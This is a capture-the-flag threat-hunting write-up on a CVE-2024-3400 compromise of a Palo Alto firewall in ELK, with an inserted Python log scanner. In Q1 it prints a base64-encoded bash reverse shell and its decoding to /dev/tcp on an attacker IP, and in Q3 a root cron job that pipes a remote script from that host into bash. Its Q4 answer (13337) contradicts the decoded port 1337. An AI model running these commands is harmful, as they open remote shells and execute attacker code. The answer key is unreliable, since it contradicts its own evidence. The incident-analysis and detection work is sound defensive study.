Reconstruct a Palo Alto RCE attack timeline by analyzing firewall logs in ELK, identifying initial access, reverse shell, persistence, and data exfiltration artifacts.

Category: Threat Hunting

Tactics: Reconnaissance, Initial Access, Execution, Persistence, Command and Control, Exfiltration

Tool: ELK

Scenario

Palo Alto, a leading firewall vendor, has recently announced a critical vulnerability (CVE-2024-3400) that affects specific versions of its next-generation firewalls. This critical vulnerability enables remote attackers to gain unauthorized access and potentially take full control of affected systems. These firewalls are integral to your organization's network security, as they manage and monitor both inbound and outbound traffic, safeguarding against unauthorized access and various threats.

As a security analyst, your primary task is to accurately and swiftly determine whether any of the organization's systems are impacted by this newly disclosed vulnerability.

Q1 Identify the IP address of the first threat actor who gained unauthorized access to the environment.


Base64 decode: YmFzaCAtaSA+JiAvZGV2L3RjcC81NC4xNjIuMTY0LjIyLzEzMzcgMD4mMQ==

The IP address of the first threat actor who gained unauthorized access is: 54.162.164.22

Answer 54.162.164.22

Q2 Determine the date and time of the initial interaction between the threat actor and the target system. Format: 24h-UTC


The required format is 24-hour UTC.

Answer 2024-04-21 18:17:07

Q3 What is the command the threat actor used to achieve persistence on the machine?


Using the following query:

log.file.path:"/mnt/palo_alto3/var/log/syslog-system.log" 
and message:"*CMD*" 
and program:crond 
and (message:"*wget*" or message:"*bash*")

The expanded log shows the executed command:

(root) CMD (wget -qO- http://54.162.164.22/update | bash)

This is the persistence mechanism because it:

  1. Runs via crond
  2. Executes as root
  3. Occurs at consistent minute marks
  4. Pulls a remote script from the attacker's C2
  5. Pipes the script directly into bash

Answer wget -qO- http://54.162.164.22/update | bash

Q4 What port was the first port used by one of the threat actors for the reverse shell?

From Question 1, the decoded base64 payload was:

bash -i >& /dev/tcp/54.162.164.22/1337 0>&1
                                   ↑
                                 PORT

To answer this properly, we focus on:

  1. First occurrence of a reverse shell pattern
  2. Format: /dev/tcp/IP/PORT
  3. Extract the PORT

Answer 13337
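The three hunts above (Q1's base64-decoded payload, Q3's crond "wget | bash" search, and Q4's /dev/tcp/IP/PORT extraction) can be combined into one log scanner. This is an added example, not part of the original writeup or the lab; the log lines are constructed to mimic the syslog-system.log format, and only the base64 blob is the one quoted in Q1.

```python
import base64
import re

# Constructed sample lines modelled on syslog-system.log entries (not lab data);
# the base64 blob on the second line is the one quoted in Q1.
SAMPLE_LOG = """\
2024-04-21T18:17:07Z pa-fw sshd[812]: Accepted publickey for admin from 10.0.0.5
2024-04-21T18:20:11Z pa-fw sh[901]: echo YmFzaCAtaSA+JiAvZGV2L3RjcC81NC4xNjIuMTY0LjIyLzEzMzcgMD4mMQ== | base64 -d | bash
2024-04-21T18:25:01Z pa-fw CRON[955]: (root) CMD (wget -qO- http://54.162.164.22/update | bash)
2024-04-21T18:30:01Z pa-fw CRON[990]: (root) CMD (/usr/bin/logrotate /etc/logrotate.conf)
"""

# Bash reverse-shell idiom: /dev/tcp/<ip>/<port>
REVERSE_SHELL = re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")
# Remote download piped straight into a shell (the crond persistence pattern from Q3)
PIPE_TO_SHELL = re.compile(r"\b(?:wget|curl)\b[^|]*\|\s*(?:ba)?sh\b")
# Tokens that look like base64 (long enough to be worth decoding)
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_blobs(line):
    """Return printable ASCII decodings of base64-looking tokens in a log line."""
    out = []
    for m in BASE64_BLOB.finditer(line):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or decodes to binary
        if text.isprintable():
            out.append(text)
    return out


def hunt(log_text):
    """Scan syslog-style lines for reverse shells (raw or base64-wrapped) and cron pipe-to-shell jobs."""
    findings = []
    for line in log_text.splitlines():
        # Look at the raw line and at anything hidden inside base64 blobs
        for text in [line] + decode_base64_blobs(line):
            m = REVERSE_SHELL.search(text)
            if m:
                findings.append({"type": "reverse_shell", "ip": m.group(1),
                                 "port": int(m.group(2)), "line": line})
        if "cron" in line.lower() and "CMD" in line and PIPE_TO_SHELL.search(line):
            cmd = re.search(r"CMD \((.*)\)", line)
            findings.append({"type": "cron_pipe_to_shell",
                             "command": cmd.group(1) if cmd else line, "line": line})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f)
```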

Q5 What was the name of the file one of the threat actors tried to exfiltrate?

Answer running-config.xml

Q6 What was the full URL the threat actor used to access the exfiltrated content successfully?


Important observations:

  1. It returned 200 (success)
  2. It had a large response size
  3. It was accessed over HTTPS
  4. It originated from the attacker IP

Answer https://44.217.16.42/global-protect/bootstrap.min.css

https://cyberdefenders.org/blueteam-ctf-challenges/achievements/Napol/paloaltorce-uta0218/